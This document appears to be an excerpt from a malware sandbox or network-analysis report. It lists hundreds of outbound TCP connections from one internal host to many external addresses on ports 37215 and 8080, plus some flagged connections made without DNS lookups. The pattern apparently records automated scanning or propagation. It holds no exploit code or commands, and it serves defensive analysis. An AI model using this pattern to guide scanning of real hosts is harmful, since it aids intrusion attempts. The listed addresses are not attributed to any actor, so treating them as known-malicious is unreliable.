Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.216.192.95:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.153.143.82:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.155.65.95:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.25.68.218:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.134.10.83:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.214.195.57:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.14.94.38:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.242.141.113:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.59.113.63:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.25.120.62:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.82.164.52:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.168.19.22:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.23.166.252:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.86.125.66:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.174.132.109:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.177.193.98:37215
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.89.11.59:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.135.178.59:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.155.64.58:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.222.71.22:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.212.128.16:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.17.183.144:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.215.248.174:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.115.84.2:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.99.122.144:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.70.121.10:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.231.208.121:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.155.194.97:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.125.207.164:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.95.213.32:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.245.115.249:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.38.99.84:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.52.44.128:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.132.139.22:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.129.143.176:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.106.50.4:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.164.7.163:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.40.1.122:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.167.47.240:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.197.253.131:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.185.172.25:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.250.71.223:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.235.148.179:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.152.117.62:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.58.181.141:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.80.232.197:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.42.180.147:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.22.131.50:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.219.116.175:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.2.115.74:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.113.228.158:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.185.255.54:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.250.209.53:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.180.149.72:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.44.98.190:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.5.82.215:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.57.191.176:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.79.208.67:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.25.38.228:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.123.106.17:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.191.216.13:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.21.4.89:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.155.21.248:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.156.89.234:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.33.229.44:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.218.146.186:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.50.158.160:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.209.214.232:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.54.202.238:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.243.64.244:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.196.62.230:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.57.250.91:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.21.112.72:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.206.27.192:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.221.87.193:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.65.162.182:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.26.149.45:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.76.250.26:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.135.80.113:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.8.130.105:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.105.254.248:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.124.154.173:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.157.121.191:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.177.67.207:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.141.232.44:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.80.111.66:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.44.138.137:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.231.92.232:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.186.92.116:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.118.96.10:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.15.57.59:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.72.173.53:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.28.180.200:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.226.96.186:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.78.158.132:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.128.27.108:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.12.233.147:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.238.27.12:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.62.215.161:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.227.176.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.175.191.3:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.247.129.249:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.81.140.59:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.131.144.76:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.105.187.211:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.182.74.54:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.67.114.116:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.58.129.251:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.254.241.155:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.249.248.28:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.143.204.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.177.120.233:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.98.54.152:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.226.159.1:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.68.152.207:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.191.33.218:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.38.219.129:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.219.152.125:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.20.73.195:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.105.99.33:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.121.117.185:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.67.131.126:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.186.22.37:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.62.23.161:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.3.216.241:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.196.64.109:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.234.166.54:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.40.127.100:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.142.206.171:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.57.18.195:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.188.90.199:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.193.8.131:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.84.29.227:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.75.65.106:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.53.36.47:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.136.30.164:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.132.125.48:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.52.30.221:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.155.48.234:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.31.161.233:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.27.8.28:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.37.54.149:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.82.195.250:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.155.28.212:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.176.84.227:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.134.166.31:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.100.2.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.20.87.80:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.195.131.249:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.226.127.136:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.242.71.64:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.74.215.107:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.205.175.87:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.222.55.198:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.229.102.222:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.38.42.173:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.111.88.88:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.129.124.254:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.1.151.147:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.145.48.65:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.159.121.121:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.218.227.150:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.1.94.119:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.109.7.209:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.250.151.70:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.131.9.147:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.123.6.73:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.85.24.171:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.27.27.223:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.15.112.16:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.52.136.20:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.118.164.150:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.38.32.100:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.250.22.21:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.173.6.171:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.251.170.36:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.151.44.235:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.209.115.192:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.32.192.33:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.49.63.88:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.162.43.100:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.251.235.62:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.118.169.18:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.236.170.1:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.33.198.255:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.64.110.27:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.21.44.245:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.104.108.199:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.127.172.94:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.172.107.151:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.212.204.113:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.220.68.82:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.202.158.81:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.114.165.12:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.3.192.76:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.14.207.0:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.253.48.225:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.86.41.11:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.146.242.114:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.162.87.218:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.43.156.226:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.87.105.13:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.210.255.225:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.142.226.174:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.219.53.17:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.192.80.192:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.97.167.52:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.250.178.98:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.115.0.163:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.77.136.131:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.248.61.245:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.207.231.77:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.123.131.232:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.156.40.61:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.18.190.249:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.54.9.60:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.174.120.63:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.164.47.144:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.155.174.133:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.147.187.174:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.13.57.225:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.139.3.12:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.183.220.13:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.189.62.241:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.124.8.248:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.122.98.165:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.213.169.163:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.85.24.248:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.31.74.125:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.107.218.58:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.96.203.186:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.214.6.204:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.145.118.42:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.98.197.190:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.70.28.189:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.59.75.6:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.23.197.49:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.224.251.133:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.164.220.71:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.37.23.124:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.109.17.118:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.236.153.206:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.213.227.186:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.92.32.50:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.236.150.110:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.36.3.31:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.177.81.234:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.220.78.70:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.110.123.183:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.239.59.60:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.63.111.87:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.138.49.143:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.245.250.11:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.224.100.99:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.10.157.94:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.102.196.143:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.29.23.189:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.36.15.138:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.187.239.198:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.176.6.210:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.21.113.47:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.105.46.218:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.137.36.254:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.182.227.55:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.105.53.161:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.149.70.30:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.77.4.237:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.197.96.57:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.249.33.187:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.142.163.185:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.136.232.127:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.12.170.158:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.30.87.213:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.195.89.151:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.235.110.147:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.65.230.173:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.3.16.63:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.174.231.57:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.143.10.118:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.255.152.52:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.70.74.163:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.207.231.35:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.73.116.80:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.74.249.22:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.251.247.187:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.202.23.1:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.94.96.164:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.113.204.59:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.248.211.27:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.239.46.11:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.174.186.79:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.97.176.233:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.164.143.58:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.39.230.210:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.4.184.246:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.121.165.35:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.50.38.0:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.215.167.110:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.53.120.182:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.171.130.53:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.168.233.61:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.56.72.58:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.142.204.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.226.106.234:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.247.238.52:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.211.43.228:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.251.42.165:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.208.222.68:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.252.20.244:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.200.58.220:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.52.10.233:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.14.160.69:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.20.145.35:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.172.119.143:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.114.227.184:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.177.39.115:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.149.90.23:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.255.188.2:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.63.67.17:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.118.40.228:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.76.223.133:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.110.87.161:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.125.217.127:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.235.46.169:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.209.208.47:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.186.125.138:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.160.20.161:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.176.249.192:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.253.107.251:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.120.229.207:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.117.138.78:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.153.134.22:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.74.35.185:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.95.176.207:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.16.237.89:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.139.122.247:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.100.65.3:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.131.116.1:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.218.26.51:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.153.194.118:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.61.22.235:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.98.76.135:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.211.197.10:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.174.114.63:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.115.214.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.34.99.104:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.11.125.167:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 62.110.67.117:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.15.77.217:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.58.252.76:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.34.214.153:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 31.13.215.58:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 85.178.57.174:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 95.7.70.180:8080
Source: global traffic	TCP traffic: 192.168.2.15:6758 -> 94.244.93.105:8080

Source: unknown	TCP traffic detected without corresponding DNS query: 112.159.178.59
Source: unknown	TCP traffic detected without corresponding DNS query: 112.65.11.59
Source: unknown	TCP traffic detected without corresponding DNS query: 112.198.135.22
Source: unknown	TCP traffic detected without corresponding DNS query: 112.93.134.58
Source: unknown	TCP traffic detected without corresponding DNS query: 112.201.119.144
Source: unknown	TCP traffic detected without corresponding DNS query: 112.250.64.38
Source: unknown	TCP traffic detected without corresponding DNS query: 112.35.251.151
Source: unknown	TCP traffic detected without corresponding DNS query: 112.141.173.12
Source: unknown	TCP traffic detected without corresponding DNS query: 112.24.22.225
Source: unknown	TCP traffic detected without corresponding DNS query: 112.68.55.98
Source: unknown	TCP traffic detected without corresponding DNS query: 112.46.212.80
Source: unknown	TCP traffic detected without corresponding DNS query: 112.220.90.223
Source: unknown	TCP traffic detected without corresponding DNS query: 112.108.183.173
